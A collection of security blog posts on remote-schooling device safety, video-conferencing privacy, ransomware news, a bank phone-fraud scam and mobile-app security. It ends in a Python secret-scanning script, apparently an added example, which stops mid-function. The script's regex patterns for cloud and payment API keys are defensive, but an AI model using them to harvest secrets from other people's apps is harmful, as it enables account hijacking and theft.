Whether you’re a few weeks into a school closure or going on a few months now, you’re no doubt helping your school-aged children—and even your college kids—settle into a new routine that involves learning from home. Needless to say, it’s an adjustment for everyone as you and your children make the shift. As a parent, you might be feeling responsible for a range of academic responsibilities that go well beyond after-dinner homework help. In light of what we’re all facing, we reached out to a long-time educator for some specific advice about bringing structure to the school day at home.

While you’re probably accustomed to logging on to your school’s homework and grade-posting platform, what’s likely to be entirely new territory is monitoring regular emails from one to several staff members and coaches looping you in to help them make some type of learning happen from home for your children. We’re all a little overwhelmed already.


Parents told us just that. In our recent survey, the aspect of this new landscape they struggle with most is setting a routine, and it’s no wonder. The school day is a constant for all of us. It starts and ends at a certain time every day without fail. Bells at the exact same time each day signal the beginning, end, and all points in between including lunch at, you guessed it, the exact same time every day.

So why doesn’t this structure transfer easily to the home? It’s just a location change, right? School is social—a group effort—and it’s run by adults outside the home who set expectations, from where to be when the bell rings to how many minutes for breaks and lunches. Home is, well, home with its own set of expectations, rules, and freedoms plus a refrigerator and a TV and devices nearby and no bells except a morning alarm clock. Does it even make sense to try to bring the exact same structure to the home learning environment?


What if we saw this abrupt change as an opportunity to do things a different way? For example, school starts early for most high schoolers despite research that indicates later start times work better for teens. If your child doesn’t have a set schedule from the school, then you have the opportunity to set one that just might work better for your family. Students anywhere from late elementary school all the way to senior year can help set their own schedule (contingent upon other factors, of course, like helping with siblings or other family duties).

In all, setting a rhythm is key. A teenager experiencing a separation from friends is likely spending even more time online or on a device as a means to pass the time and connect with others. Their new rhythm might mean later nights and later bedtimes than normal. Letting your high school-aged student sleep in and start the at-home school day in late morning might give you some time to get your own work started and prepare for the day. If you’re sharing computers, printers, or other devices, letting your teenager sleep in makes it a bit easier to allocate time for yourself and others.


A middle school or high school aged student’s school day might work out better running from 10 a.m. to 2 p.m. with 15-minute breaks and up to a full hour for lunch. Bottom line: teenagers love freedom and choice. Letting them have some control over the timing of their school day, to the extent possible, may help keep them more engaged and focused. For example, middle schoolers may get as little as five minutes to pass from class to class. Why not offer 15 minutes between at-home classes? Many public schools allow 30 minutes for lunch. Home lunch might be an hour or maybe even a little more. During home lunch, maybe phones are out and kids have free time to eat, check their texts or social media, listen to a podcast or audiobook while they eat or just relax.

While most adolescents will sleep later given the chance, younger children might still be up early. Starting a learn-from-home-schedule on the earlier side for younger ones might alleviate late mornings spent vying for computer time. There’s no one perfect way to do this. It might work best to start school at 8 a.m. together at the kitchen table and then go about the day as your children do during the normal school year; however, it might work best to let the older kids sleep in while the younger ones enjoy a waffle and an audiobook, allowing you time to have your coffee, catch up on emails, and get ready for the day.


Khan Academy, the online educational service known best for its video tutorials, has created sample school day structures in direct response to the current school closures for learners in four age groups from preschool through 12th grade. Khan Academy’s Daily Schedules start all grade levels at 8 a.m., but older kids could easily adapt the basics of the schedule and start later in the morning.

In addition to the sample schedule, each age group chart links to grade-appropriate video tutorials in math—something Khan Academy is well known for—along with other opportunities for learning in almost all subject areas. If your child’s school is still in the process of formulating the specifics of its own from-home learning program, Khan Academy has a full day of learning options already mapped out. You might be surprised to see the breadth of offerings and the materials available to assist families during school closures.

For example, children in grades 3-5 start the day with short, interactive math videos for about 30 minutes followed by play time, ideally outside. Next up is 30 minutes of guided reading followed by silent reading. The rest of the day continues with small segments allotted for writing, grammar, lunch time, and even computer programming. Everything you need to complete the school from home day is available directly on the site or via links.

Another great resource is Scholastic, the education and publishing company well known for its school book fairs. Like Khan Academy, Scholastic’s newly created Learn From Home site also offers some structure to the school day arranged by grade level where you’ll find a wealth of books online plus supplemental videos for kindergarten through grade 9. For example, Week 1 material for a first grader is centered around five days of stories, each with a different focus: animal studies, weather, sound and music, farm life, and healthy bones. Each day’s area of focus offers audio and video stories, read-alongs, and supplemental videos for drawing and spelling—all connected to that day’s theme.

Khan Academy and Scholastic are both reputable sources. Yet there are plenty of others, and it’s quite possible you’re seeing plenty of suggested resources, particularly if you’re searching for them online. When consulting these sources, be sure to do some research and make sure they’re reputable as well. Also, consider using browser protection that will protect you from malicious links or malware-ridden downloads. Sad but true, there are those out there who are willing to take advantage of families who’re looking for online education resources during these times.


Teachers are experts at establishing routines, boundaries, and expectations for school work and behaviors. This is part of building the culture of the classroom, and it starts back at the beginning of the school year on day one. It’s no wonder children have a harder time settling into a routine and remaining focused on school at home. It’s not the easiest transfer of skills. In the adult world, for example, if you’re working from home, you may not structure your workday in the same way you would if you were actually at the office. The same applies for the kids.


Here are a few things you can do:

  • Look over the emails and announcements from your child’s school. What are the non-negotiables like online class meetings and due dates? Pencil those in.
  • Set a schedule like mentioned above, at least as a starting point. You can adjust and adapt it as needed, all with an eye toward what works for you and your family overall as you settle into your new routine.
  • The youngest children might have a hard time focusing for an online check-in with their kindergarten class but seeing their classmates online might be important socially with other options currently limited. If possible, try to make sure you help even your littlest ones make their meetings. Or even set up a digital playdate for them.
  • For older kids, online lessons are likely essential right now. Then, knowing your child best and asking for their input, you can be flexible in creating a daily routine that optimizes personal schedules, preferences, and family responsibilities.
  • Work together. In many households, family members may use a shared device to get everyone’s work and schooling done. Now’s a good time to set a schedule for sharing those devices and to make sure they are secure.

We hope we’ve offered you a few helpful resources for structuring an entire school day or adding to an existing structure, and that you might see some opportunities to benefit from a change in routine. No doubt, we’re all adapting to the changes brought about by school closures, yet each family’s situation is different. Some days it just might not work out as planned, and that’s ok. The bottom line right now is flexibility and compromise, and it’s worth it to allow yourself a little grace as you find what works at your home.

The post School #FromHome: Bring Structure to Your Day appeared first on McAfee Blogs.

Rethinking Zoom? How WebEx, Teams, and Google Meet and Duo Compare on Privacy and Security

If you’re among the many looking for a new video conferencing tool after adding “zoombombing” to your vocabulary, you’re in luck. While a one-size-fits-all solution doesn’t exist, there are many other options with proven security features. Here’s a roundup of some of Zoom’s competitors and their privacy and security features.

Webex
The Webex video conference platform has been around since 1995 and is a favorite of the privacy-conscious health care, information technology, and financial services industries. This is partially due to the fact that all three industries commonly relied on virtual meetings well before the Covid-19 pandemic, but mostly because Webex has a reputation for maintaining robust cybersecurity. Cisco, its parent company, is an industry leader in network hardware, software, and security products.

Webex offers end-to-end encryption. Using it, however, limits popular video options, including remote computer sharing and personal meeting rooms. Worth noting: Webex and Cisco products have had security issues in the past.

Microsoft Teams

Like Zoom, Microsoft Teams experienced an uptick in the recent crisis, in part due to its integration with the company’s flagship Office365 cloud and productivity services. Microsoft says that Teams is encrypted “in transit and at rest,” but details about support for end-to-end encryption are vague.

Like Webex, one advantage of Teams is that its parent company is a major provider of networking, software, and cybersecurity services. Microsoft has an internal rating system for the security of its products, and has designated Teams to be Tier-D compliant, which means that it can adhere to the strictest government and industry security standards and legal requirements.

Neither Microsoft nor Teams is immune to security vulnerabilities, but as a company, Microsoft’s bandwidth to address them when they occur is probably unparalleled. Microsoft also has a more transparent privacy policy and a better track record when it comes to protecting user and customer data than many of its competitors, including Zoom.

Google Hangouts/Google Duo

Google offers Hangouts and Duo as its two primary video meeting platforms; both offer “free” and paid versions bundled in with its G Suite line of applications. While Google Hangouts offers similar functionality to Zoom, it has a limit of 25 attendees per video conference. Other considerations include a long history of security and privacy concerns and the fact that Google Hangouts doesn’t offer end-to-end encryption.

Duo is end-to-end encrypted, and can support video meetings with up to 12 attendees.

Like Cisco and Microsoft, Google has more resources dedicated to cybersecurity, but the company has a lengthy track record of mining user data, especially for “free” services. The company is also notorious for quickly and unceremoniously dropping support for many of its projects, and has done so with several previous video conferencing and meeting apps.

Is Zoom Worth Sticking With?

It depends on your business needs. Zoom’s rapid increase in popularity in an already crowded market is a testament to its many qualities, features, and ease of use.

The company has made some misleading claims about user privacy and data, and the recent discovery of multiple serious security vulnerabilities will test the company’s ability to support and sustain its user base.

A good sign is that Zoom announced a 90-day freeze on any new features so it can focus on security and privacy issues. This move could help the platform and the company to continue the meteoric rise in the number of people using the service.

For industries with stringent data privacy and security requirements, platforms like Webex or Microsoft Teams may be a better fit, but every company, platform, and technology has its own set of drawbacks and vulnerabilities. The main takeaway is that every company, regardless of size, needs to have a solid understanding of what its own internal security needs are in order to make an informed decision.

The post Rethinking Zoom? How WebEx, Teams, and Google Meet and Duo Compare on Privacy and Security appeared first on Adam Levin.

School from Home: “Square One” Basics

With many schools around the globe postponing classes for long stretches or closing school outright for the rest of the academic year, the challenge of parenting just cranked up. After all, there’s no more schoolhouse—it’s your house. Whether you’re the parent of a kindergartener or a high school senior, or have a mix of children in between, there’s a good chance you’re trying to figure out how to continue learning online at home—while also dealing with the disappointments of missing friends, activities, and major events like sports, proms, and even graduations. It’s not easy, and without a doubt this is new to all of us.

We want to make it easier for you, even if it’s in some small ways. We started by asking you what roadblocks are getting in the way. This April, we reached out to parents across the U.S. and asked  . Your top two answers came across loud and clear: you’re struggling with establishing a routine and keeping children focused.

Looking for resources and ideas for bringing a little structure into online learning at home and how that fits into your day? We have you covered, so let’s start at square one—making sure that your online learning environment at home is secure.

Start with a look at your devices

First, determine which device your child is going to use. Some school districts provide students with a laptop that the students keep for the school year. The security on these devices will more than likely be managed centrally by the school district. Thus, they’ll have their own security software and settings already in place. Moreover, such a centrally managed device will likely be limited in terms of which settings can be updated and what software can be added. If your child has a school-issued device, follow the advice of the school and its IT admin on matters of security tools and software. And if you have questions about security, reach out to them.

Security basics on your home computer and laptop

If your child is using a home computer or laptop, or sharing one with other members of the family, you’ll want to ensure that it’s protected. This includes a full security suite that features more than just anti-virus: firewall protection to keep hackers at bay, safe browsing tools that steer you clear of sketchy or unsafe websites, and perhaps even parental controls to block distracting apps and inappropriate websites. Another smart option is to use a password manager. There’s a good chance that your kids will need to create new accounts for new learning resources, and with those come new usernames and passwords. A password manager will organize them and keep them safe.

Video conferencing

Additionally, you’ll want to take a very close look at the video conferencing tools that your child might be using to connect with teachers and classmates (and even their friends after schooltime is over). First off, there are plenty of them out there. Secondly, some video conferencing tools have allegedly experienced security and privacy issues in recent weeks. Before downloading and installing a video conferencing tool, do a little online research to see how secure it is and what privacy policies it has in place.

Look for video conferencing tools that use end-to-end encryption so that the conference is protected from prying eyes and so that others can’t intrude upon the conversation uninvited. Look for articles from reputable sources too, as there have been further reports of privacy issues where certain user information has been shared with third parties while using the video conferencing tool. That’s good advice for any software, apps, or tools you may wish to add.

Use a VPN

Another way to protect yourself from intrusions while conferencing, or doing anything else online for that matter, is to introduce a VPN (virtual private network). Choose one that uses bank-level encryption to keep your personal data and activities private from hackers. It will also hide other information, like account credentials, credit card numbers, and the like. It’s a good move, and it’s easy to use.

Next up

Look for our upcoming articles where we’ll share some specific ideas that can help make homeschooling online a little easier.

The post School from Home: “Square One” Basics appeared first on McAfee Blogs.

Cyber News Rundown: Ransomware Hits LA Suburbs

Reading Time: ~ 2 min.

Los Angeles Suburb Hit with Ransomware

Last month, the City of Torrance, California fell victim to a ransomware attack that shut down many of its internal systems and demanded 100 Bitcoins to not publish the stolen data. Along with the roughly 200GB of data it stole from the city, the DoppelPaymer ransomware also deleted all local backups and encrypted hundreds of workstations. At this time, it’s uncertain whether the City of Torrance has chosen to pay the ransom, as the malware authors seem to have diligently removed any means for the City to recover on its own.

Malicious Packages Hidden Within Popular File Repository

Over 700 malicious packages have been discovered within the RubyGems main program and file repository. These originated from just two accounts and were uploaded within a single week in late February. Between them, the many packages have a combined download count of over 100,000, most of which included a cryptocurrency script that could identify and intercept cryptocurrency transactions being made on Windows® devices. While this isn’t the first time malicious actors have used open source file repositories to distribute malicious payloads, this infiltration of an official hub for such a long period of time speaks to the lack of security within these types of systems.

Maze Ransomware Targets Cognizant ISP

Late last week, the Maze Ransomware group took aim at New Jersey-based internet service provider, Cognizant, and took down a significant portion of their internal systems. The attack occurred just a day after the removal of a dark web post that offered access to an IT company’s systems for $200,000. It had been listed for nearly a week. While Cognizant has already begun contacting its customers about the attack, the true extent of the damage remains unclear.

COVID-19 Scams Net $13 Million

The Federal Trade Commission recently released statistics on the number of complaints they’ve received specifically related to the COVID-19 pandemic: it’s over 17,000 in just a three-month period. While this number is assuredly less than the actual number of COVID-19 related scams, these reported complaints have resulted in a sum of over $13 million in actual losses, ranging from fraudulent payments to travel cancellations and refunds. Additionally, the FTC was able to catalogue over 1,200 COVID-19 related scam calls reported by people on the Do Not Call list.

Customer Data Stolen from Fitness App

A database containing 40GB of personally identifiable information on thousands of customers of the fitness app Kinomap was found unsecured. Containing a total of 42 million records, the database remained accessible for nearly 2 weeks after the company was informed. It was only secured at last after French data protection officials were notified. Kinomap API keys were also among the exposed data, which would have allowed malicious visitors to hijack user accounts and steal any available data.

The post Cyber News Rundown: Ransomware Hits LA Suburbs appeared first on Webroot Blog.

The Truth about Hackers, in Black and White (and Grey)

Reading Time: ~ 4 min.

Did you know there are three primary types of hacker—white hats, black hats, and grey hats—and that there are subcategories within each one? Despite what you may have heard, not all hackers have intrinsically evil goals in mind. In fact, there are at least 300,000 hackers throughout the world who have registered themselves as white hats.

Also known as ethical hackers, white hats are coders who test internet systems to find bugs and security loopholes in an effort to help organizations lock them down before black hat hackers, i.e. the bad guys, can exploit them. Black hats, on the other hand, are the ones we’re referring to when we use words like “cybercriminal” or “threat actor.” These are hackers who violate computer security and break into systems for personal or financial gain, destructive motives, or other malicious intent.

The last of the three overarching types, grey hat hackers, are the ones whose motives are, well, in a bit of a grey area. Similar to white hats, grey hats may break into computer systems to let administrators know their networks have exploitable vulnerabilities that need to be fixed. However, from there, there’s nothing really stopping them from using this knowledge to extort a fee from the victim in exchange for helping to patch the bug. Alternatively, they might request a kind of finder’s fee. It really depends on the hacker.

So, hackers can be “good guys”?

Yes, they absolutely can.

In fact, there’s even an argument that black hats, while their motivations may be criminal in nature, are performing a beneficial service. After all, each time a massive hack occurs, the related programs, operating systems, businesses, and government structures are essentially shown where and how to make themselves more resilient against future attacks. According to Keren Elezari, a prominent cybersecurity analyst and hacking researcher, hackers and hacktivists ultimately push the internet and technology at large to become stronger and healthier by exposing vulnerabilities to create a better world.

Why do they hack?

The shortest, simplest answer: for the money.

While white and grey hat hackers have altruistic motives in mind and, at least in the former group, are invested in ensuring security for all, the fact of the matter is that there’s a lot of money to be made in hacking. The average Certified Ethical Hacker earns around $91,000 USD per year. Additionally, to help make their products and services more secure, many technology companies offer significant bounties to coders who can expose vulnerabilities in their systems. For example, Apple offered a reward of $1.5 million USD last year to anyone who could hack an iPhone to find a serious security flaw. There are even groups, such as HackerOne, which provide bug bounty platforms that connect businesses with ethical hackers and cybersecurity researchers to perform penetration testing (i.e. finding vulnerabilities). Multiple hackers on the HackerOne bug bounty platform have earned over $1 million USD each.

And for black hats, theft, fraud, extortion, and other crimes can pay out significantly more. In fact, some black hats are sponsored by governments (see the Nation-State category below).

You mentioned subtypes. What are they?

As with many groups, there’s a wide range of hacker personas, each with different motivations. Here are a few of the basic ones you’re likely to encounter.

Script Kiddies

When you picture the stereotypical “hacker in a hoodie”, you’re thinking of a Script Kiddie. Script Kiddies are programming novices who have at least a little coding knowledge but lack expertise. Usually, they get free and open source software on the dark web and use it to infiltrate networks. Their individual motives can place them in black, white, or grey hat territory.

Hacktivists

Ever hear of a group of hackers called Anonymous? They’re a very well-known example of a hacktivist group who achieved notoriety when they took down the CIA’s website. Hacktivists are grey hat hackers with the primary goal of bringing public attention to a political or social matter through disruption. Two of the most common hacktivist strategies are stealing and exposing sensitive information or launching a distributed denial of service (DDoS) attack.

Red Hats

Red hats are sort of like grey hats, except their goal is to block, confound, or straight-up destroy the efforts of black hat hackers. Think of them like the vigilantes of the hacker world. Rather than reporting breaches, they work to shut down malicious attacks with their own tools.

Nation-State Hackers
Remember earlier in this post when we mentioned that some black hats are sponsored by governments? That would be this group. Nation-state hackers are ones who engage in espionage, social engineering, or computer intrusion, typically with the goal of acquiring classified information or seeking large ransoms. As they are backed by government organizations, they are often extremely sophisticated and well trained.

Malicious Insiders

Perhaps one of the more overlooked threats to a business is the malicious insider. An insider might be a current or former employee who steals or destroys information, or it might be someone hired by a competitor to infiltrate an organization and pilfer trade secrets. The most valuable data for a malicious insider is usernames and passwords, which can then be sold on the dark web to turn a hefty profit.

What are your next steps?

Now that you better understand the hacker subtypes, you can use this information to help your organization identify potential threats, as well as opportunities to actually leverage hacking to protect your business. And if you haven’t already, check out our Lockdown Lessons, which include a variety of guides, podcasts, and webinars designed to help MSPs and businesses stay safe from cybercrime.

Beyond the educational steps you’re taking, you also need to ensure your security stack includes a robust endpoint protection solution that uses real-time threat intelligence and machine learning to prevent emerging attacks. Learn more about Webroot® Business Endpoint Protection or take a free trial here.

The post The Truth about Hackers, in Black and White (and Grey) appeared first on Webroot Blog.

Isolation Idea – 1,001 Albums You Must Hear Before You Die

I saw a post from a colleague about a book he had called 1,001 Albums You Must Hear Before You Die. Loving music I was intrigued regardless but I decided to buy the hard copy of the book and turn it into an isolation activity. I am glad I did.

The post Isolation Idea – 1,001 Albums You Must Hear Before You Die appeared first on Binary Blogger.

When in Doubt: Hang Up, Look Up, & Call Back

Many security-conscious people probably think they’d never fall for a phone-based phishing scam. But if your response to such a scam involves anything other than hanging up and calling back the entity that claims to be calling, you may be in for a rude awakening. Here’s how one security and tech-savvy reader got taken for more than $10,000 in an elaborate, weeks-long ruse.

Today’s lesson in how not to get scammed comes from “Mitch,” the pseudonym I picked for a reader in California who shared his harrowing tale on condition of anonymity. Mitch is a veteran of the tech industry — having worked in security for several years at a fairly major cloud-based service — so he’s understandably embarrassed that he got taken in by this confidence scheme.

On Friday, April 17, Mitch received a call from what he thought was his financial institution, warning him that fraud had been detected on his account. Mitch said the caller ID for that incoming call displayed the same phone number that was printed on the back of his debit card.

But Mitch knew enough of scams to understand that fraudsters can and often do spoof phone numbers. So while still on the phone with the caller, he quickly logged into his account and saw that there were indeed multiple unauthorized transactions going back several weeks. Most were relatively small charges — under $100 apiece — but there were also two very recent $800 ATM withdrawals from cash machines in Florida.

If the caller had been a fraudster, he reasoned at the time, they would have asked for personal information. But the nice lady on the phone didn’t ask Mitch for any personal details. Instead, she calmly assured him the bank would reverse the fraudulent charges and said they’d be sending him a new debit card via express mail. After making sure the representative knew which transactions were not his, Mitch thanked the woman for notifying him, and hung up.

The following day, Mitch received another call about suspected fraud on his bank account. Something about that conversation didn’t seem right, and so Mitch decided to use another phone to place a call to his bank’s customer service department — while keeping the first caller on hold.

“When the representative finally answered my call, I asked them to confirm that I was on the phone with them on the other line in the call they initiated toward me, and so the rep somehow checked and saw that there was another active call with Mitch,” he said. “But as it turned out, that other call was the attackers also talking to my bank pretending to be me.”

Mitch said his financial institution has in the past verified his identity over the phone by sending him a one-time code to the cell phone number on file for his account, and then asking him to read back that code. After he hung up with the customer service rep he’d phoned, the person on the original call said the bank would be sending him a one-time code to validate his identity.

Now confident he was speaking with a representative from his bank and not some fraudster, Mitch read back the code that appeared via text message shortly thereafter. After more assurances that any additional phony charges would be credited to his account and that he’d be receiving a new card soon, Mitch was annoyed but otherwise satisfied. He said he checked his account online several times over the weekend, but saw no further signs of unauthorized activity.

That is, until the following Monday, when Mitch once again logged in and saw that a $9,800 outgoing wire transfer had been posted to his account. At that point, it dawned on Mitch that both the Friday and Saturday calls he received had likely been from scammers — not from his bank.

Another call to his financial institution and some escalation to its fraud department confirmed that suspicion: The investigator said another man had called in on Saturday posing as Mitch, had provided a one-time code the bank texted to the phone number on file for Mitch’s account — the same code the real Mitch had been tricked into giving up — and then initiated an outgoing wire transfer.

It appears the initial call on Friday was to make him think his bank was aware of and responding to active fraud against his account, when in actuality the bank was not at that time. Also, the Friday call helped to set up the bigger heist the following day.

Mitch said he and his bank now believe that at some point his debit card and PIN were stolen, most likely by a skimming device planted at a compromised point-of-sale terminal, gas pump or ATM he’d used in the past few weeks. Armed with a counterfeit copy of his debit card and PIN, the fraudsters could pull money out of his account at ATMs and go shopping in big box stores for various items. But to move lots of money out of his account all at once, they needed Mitch’s help.

To make matters worse, the fraud investigator said the $9,800 wire transfer had been sent to an account at an online-only bank that also was in Mitch’s name. Mitch said he didn’t open that account, but that this may have helped the fraudsters sidestep any fraud flags for the unauthorized wire transfer, since from the bank’s perspective Mitch was merely wiring money to another one of his accounts. Now, he’s facing the arduous task of getting identity theft (new account fraud) cleaned up at the online-only bank.

Mitch said that in retrospect, there were several oddities that should have been additional red flags. For one thing, on his outbound call to the bank on Saturday while he had the fraudsters on hold, the customer service rep asked if he was visiting family in Florida.

Mitch replied that no, he didn’t have any family members living there. But when he spoke with the bank’s fraud department the following Monday, the investigator said the fraudsters posing as Mitch had succeeded in adding a phony “travel notice” to his account — essentially notifying the bank that he was traveling to Florida and that it should disregard any geographic-based fraud alerts created by card-present transactions in that region. That would explain why his bank didn’t see anything strange about their California customer suddenly using his card in Florida.

Also, when the fake customer support rep called him, she stumbled a bit when Mitch turned the tables on her. As part of her phony customer verification script, she asked Mitch to state his physical address.

“I told her, ‘You tell me,’ and she read me the address of the house I grew up in,” Mitch recalled. “So she was going through some public records she’d found, apparently, because they knew my previous employers and addresses. And she said, ‘Sir, I’m in a call center and there’s cameras over my head. I’m just doing my job.’ I just figured she was just new or shitty at her job, but who knows maybe she was telling the truth. Anyway, the whole time my girlfriend is sitting next to me listening to this conversation and she’s like, ‘This sounds like bullshit.'”

Mitch’s bank managed to reverse the unauthorized wire transfer before it could complete, and they’ve since put all the stolen funds back into his account and issued a new card. But he said he still feels like a chump for not observing the golden rule: If someone calls saying they’re from your bank, just hang up and call them back — ideally using a phone number that came from the bank’s Web site or from the back of your payment card. As it happened, Mitch only followed half of that advice.

What else could have made it more difficult for fraudsters to get one over on Mitch? He could have enabled mobile alerts to receive text messages anytime a new transaction posts to his account. Barring that, he could have kept a closer eye on his bank account balance.

If Mitch had previously placed a security freeze on his credit file with the three major consumer credit bureaus, the fraudsters likely would not have been able to open a new online checking account in his name with which to receive the $9,800 wire transfer (although they might have still been able to wire the money to another account they controlled).

As Mitch’s experience shows, many security-conscious people tend to focus on protecting their online selves, while perhaps discounting the threat from less technically sophisticated phone-based scams. In this case, Mitch and his bank determined that his assailants never once tried to log in to his account online.

“What’s interesting here is the entirety of the fraud was completed over the phone, and at no time did the scammers compromise my account online,” Mitch said. “I absolutely should have hung up and initiated the call myself. And as a security professional, that’s part of the shame that I will bear for a long time.”

Further reading:

Voice Phishing Scams are Getting More Clever
Why Phone Numbers Stink as Identity Proof
Apple Phone Phishing Scams Getting Better
SMS Phishing + Cardless ATM = Profit

Computer-Based Training: April 2020 Release in Review

As IT systems expand in their complexity, ensuring security diligence becomes increasingly challenging. More importantly, the need for job-specific guidance becomes critical for all those involved in the secure building and operating of them, whether in Program/Project Management and Acquisition, Network Services, Systems Architecture, Development, Risk Management, or even Threat Analysis. 

Ensuring Data Security with Business Process Outsourcing Companies

The business process outsourcing (BPO) industry is known for generating savings and delivering high-quality services for its clients. Enterprises in the West started the trend and have since relied on the East for their operations.

From its beginnings in manufacturing and call centres, the industry has widened its offerings to accounting, human resources, and even professional services. This has given rise to high-value outsourcing, with research and development and other innovation work now being outsourced as well. Affordable, high-quality technology has also made it possible for small and medium businesses to try it.

Despite its popularity, many businesses worry about the risks of outsourcing their projects to a low-cost country, including data security and cybersecurity concerns and how these companies handle them.

Most BPO companies follow the data-protection and compliance standards set by bodies such as ISO and regulations such as HIPAA. Even when working remotely, they make sure that these standards and processes are followed.

The COVID-19 pandemic, which is causing disruption to businesses worldwide, continues to test the flexibility of these companies in keeping their operations running. This article looks at how BPO companies maintain data security and cybersecurity while working from home during the pandemic.

BPO companies and in-house employment

BPO companies protect data and systems by following strict security measures in their daily operations. They keep employment in-house so that they can monitor and secure their data. Most service providers also invest in high-quality infrastructure and backups to cope with power outages and data breaches.

Compliance is also mandatory for their operations. BPOs in India and the Philippines, the top outsourcing countries, pursue ISO certification and HIPAA compliance to ensure that their operations meet international standards. Keeping employees in-house makes process and compliance monitoring easier, since the work is done in a single location.

The impact of COVID-19 on in-house work

The global pandemic has affected the majority of businesses and in-house employment. Lockdowns in different countries have forced them either to halt operations or to move their employees to remote work. The outsourcing industry has felt these challenges as well.

Several countries have taken measures to keep operations running as close to business as usual as possible. Work-from-home (WFH) employees are provided with equipment and an internet connection to continue their work. Skeleton staff and those who cannot work from home are provided with accommodation in nearby hotels and lodgings.

How remote work affects security for BPOs

According to Concentrix, a distributed workforce is highly unusual in the BPO industry, since most operations are kept in-house.

These companies know that remote working introduces cybersecurity risk. An employee working over a shared or public network puts client information at risk: without a VPN and a properly configured firewall, traffic to and from the machine can be observed or tampered with by others on the same network.

Encryption is also important for protecting company and client data. Storage with weak or no encryption gives attackers an easy way to take critical information and use it for fraud, online or in the real world.

How to keep up with data security

The outsourcing industry is a flexible one. With the help of technology, BPO companies maintain the security of their data and processes remotely. This flexible arrangement has become part of their business continuity plans in these unusual times. The examples below show how BPO companies in the Philippines have made working from home work.

Data security

Letting employees use a personal computer or laptop may be acceptable for creative, programming, and design roles. However, it will not work for accounting and other roles that handle critical customer and business information.

For this reason, most companies provide the equipment for these tasks. Data is stored either on the desktop’s disk or in an encrypted cloud drive. Each store is password-protected, and only the employee and the employer can access it.


Another risk of using a personal device for work is the device itself. A personal laptop usually lacks the tooling needed to protect it from malicious activity online, and using a shared connection adds to the risk.

Desktops provided by the companies are set up with a VPN and firewall that protect them throughout the working day. For employees with slow or shared connections, companies provide a portable broadband connection for a smoother workflow.

Streamlined processes

Even in remote work, BPOs impose strict measures to keep their processes streamlined. Employers had already mastered collaboration tools and other online services while in the office, so they can keep track of work in real time.

Call centres, for instance, have a single CRM system used to record customer issues, capture information, and track issues via tickets.

The skeleton workforce, meanwhile, supervises and monitors the progress of the deployed teams. They are also tasked with checking the work quality of employees, processing transactions, closing sales deals, and reporting to the client on their tasks.

Work collaboration

Deployed teams have little to worry about when it comes to collaborating online. Many employees already use tools such as Slack and Skype for communication, G Suite for documentation, and CRM apps for capturing and entering data.

Employers also use screen monitoring software to track employees’ attendance and activity. This gives them an overview of performance, total hours worked, and the websites visited. Project monitoring tools, meanwhile, help them track the progress of the entire project and delegate tasks across the team.

Author Bio

Derek Gallimore is as passionate about outsourcing as he is about business and entrepreneurialism. Outsourcing is a booming industry, and Derek believes that every business owner should be fully aware of, and utilise, this incredible opportunity. In response to a general lack of information, he founded Outsource Accelerator. Outsource Accelerator is the world’s foremost independent and unbiased source of outsourcing information, advisory and education.

The post Ensuring Data Security with Business Process Outsourcing Companies appeared first on Heimdal Security Blog.

Way Out of The MAZE: A Quick Guide For Defending Against Maze Ransomware

From late 2019, MAZE Ransomware started becoming infamous for its Encryption, data stealing and the subsequent selling of the stolen data. Few other reasons behind its popularity are also its unique targets and the ransom demands. From its inception around May 2019, MAZE actors are targeting multiple sectors, prominent ones…

Security Threats Facing Modern Mobile Apps

We use mobile apps every day from a number of different developers, but do we ever stop to think about how much thought and effort went into the security of these apps?

It is believed that 1 out of every 36 mobile devices has been compromised by a mobile app security breach. And with more than 5 billion mobile devices globally, you do the math.

The news that a consumer-facing application or business has experienced a security breach is a story that breaks far too often. As of late, video conferencing apps like Zoom and Houseparty have been the centre of attention in the news cycle.

As apps continue to integrate into our users’ everyday lives, we cannot wait for a breach before we consider the efficacy of our security measures. When users shop online, update their fitness training log, review a financial statement, or connect with a colleague over video, we are handling their personal data and must do so responsibly.

Let’s cover some of the ways hackers access sensitive information and tips to prevent these hacks from happening to you.

The Authentication Problem

Authentication is the process of reliably determining that the person trying to access an account is the person who owns it. Single-factor authentication means accepting a username and password alone, but as we know, people choose weak passwords and reuse them across all their accounts.

If an attacker obtains a user’s username and password, even through no fault of yours (a breach at some other service, for instance), they can log in as that user and reach everything in the account.

Although two-factor authentication (2FA) can feel superfluous at times, it is a simple way to protect user accounts from hackers.

2FA requires a second means of authenticating the user, such as a code generated by an authenticator app on the user’s phone or a confirmation code sent to a mobile device or email address. A stolen password alone is then not enough to log in. One caveat: codes delivered over SMS or email are the weakest second factor, since they can be intercepted or phished; app-generated or hardware-backed codes are stronger.

Consider using an identity provider that handles authentication securely and letting users sign in with it through standard protocols such as OAuth 2.0 and OpenID Connect. Google and Facebook, for example, serve billions of users and have had to solve authentication at scale.

Reverse Engineering

Reverse engineering is when attackers pull apart a released app to understand how it works, recover embedded secrets and API endpoints, and then repackage a trojanized clone that unsuspecting people download. They do not need your source code to do this: an Android APK or an iOS binary can be decompiled or disassembled with freely available tools. A source code leak makes it easier still, and if your team is careless with permissions on repositories and version control systems, an attacker can walk right in and take the source along with any environment variables and secrets committed with it.

Obfuscation and minification make the shipped code harder to read and raise the cost of reverse engineering, but they do not prevent it: a determined analyst will still recover the logic, and anything embedded in the app (API keys, signing secrets) can be extracted. So keep secrets on the server and issue the app short-lived, scoped tokens instead; keep your code in a private repository; keep keys and credentials out of the repository, in a secrets manager rather than in committed configuration; and make sure your team knows these practices.
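To make the point concrete, here is an added example (mine, not from the original post or from CleverTap) of how cheaply a “hidden” constant is recovered from a shipped binary. The blob it scans is constructed inside the script to stand in for an app binary, and the two embedded keys are made-up values that merely follow well-known key formats (AWS access key IDs start with AKIA, Google API keys with AIza, Stripe live secret keys with sk_live_). One is stored as plain text, the other is XOR-obfuscated with a single byte; both are found.

```python
import math
import re
from typing import List, Tuple

# Well-known prefixes of secrets that commonly end up compiled into client apps.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"AKIA[0-9A-Z]{16}"),
    "google_api_key": re.compile(r"AIza[0-9A-Za-z_\-]{35}"),
    "stripe_secret_key": re.compile(r"sk_live_[0-9A-Za-z]{16,}"),
}


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking tokens score high, natural text and padding low."""
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def printable_runs(blob: bytes, min_len: int = 8) -> List[str]:
    """The 'strings' step: runs of printable ASCII of at least min_len bytes."""
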